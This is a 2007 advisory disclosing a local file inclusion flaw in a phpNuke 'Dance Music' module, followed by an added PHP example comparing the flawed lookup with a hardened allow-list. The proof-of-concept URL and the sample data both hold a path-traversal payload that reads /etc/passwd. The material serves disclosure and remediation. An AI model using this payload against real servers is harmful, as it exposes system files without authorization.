From:Janek Vind <come2waraxe_(at)_yahoo.com>
Date:26.09.2007
Subject:[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke


[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke
============================================================================

Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=251&title=Dance%20Music%20for%20PHP-Nuke

Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com


Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's take a peek at source code of "index.php":

------------>[source code]<------------

include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");

------------>[/source code]<-----------

As we can see, the "$ACCEPT_FILE" array is never initialized before entries are
assigned to it, so if "register_globals" is active, arbitrary values can be
inserted into it through $_GET/$_POST/$_COOKIE parameters.

Proof-of-concept test:

http://victim.com/modules.php?name=Dance_Music-MM&page=1&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd

Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154

So local file inclusion exists, but safe mode can make exploitation harder.


//-----> See ya soon and have a nice day ;) <-----//


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who knows me!
Greetings to Raido Kerna.
Greetings to the people of Torufoorum!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/


---------------------------------- [ EOF ] ----------------------------
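
Added example, not part of the original advisory or the module's code: the page lookup from "index.php" in the pattern the advisory describes, beside a version that assigns the allow-list before use, so a request-supplied "ACCEPT_FILE" entry cannot survive. Assumptions: PHP 7 or later, extract() stands in for "register_globals", the function names legacy_resolve and hardened_resolve are hypothetical, and the request arrays are constructed samples.

```php
<?php
// Added example. Only the three file names visible in the advisory's excerpt are listed.

// Original pattern: $ACCEPT_FILE is appended to without being initialized first.
function legacy_resolve(array $request): string
{
    extract($request); // stand-in for register_globals: request keys become variables
    $ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
    $ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
    $ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
    $page = (string)($request['page'] ?? '');
    $pagename = $ACCEPT_FILE[$page] ?? null;
    if (!isset($pagename)) $pagename = 'index.html';
    return $pagename;
}

// Corrected pattern: the list is assigned as a whole, which discards anything
// a request parameter placed in the variable beforehand.
function hardened_resolve(array $request): string
{
    extract($request); // same hostile environment as above
    $ACCEPT_FILE = [
        'Acid_house.html',
        'Alternative_dance.html',
        'Ambient_house.html',
    ];
    $page = $request['page'] ?? null;
    // Strict comparison; array-valued or unknown input falls back to the default.
    if (is_string($page) && in_array($page, $ACCEPT_FILE, true)) {
        return $page;
    }
    return 'index.html';
}

// Constructed requests: a normal page view, and the parameter shape from the
// advisory's proof-of-concept test.
$samples = [
    ['page' => 'Acid_house.html'],
    ['page' => '1', 'ACCEPT_FILE' => [1 => '../../../../../../../../../etc/passwd']],
];

foreach ($samples as $request) {
    printf("legacy: %-40s hardened: %s\n",
        legacy_resolve($request), hardened_resolve($request));
}
// In the module, the resolved name would then be used as before:
// include("modules/Dance_Music-MM/" . hardened_resolve($_GET));
```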
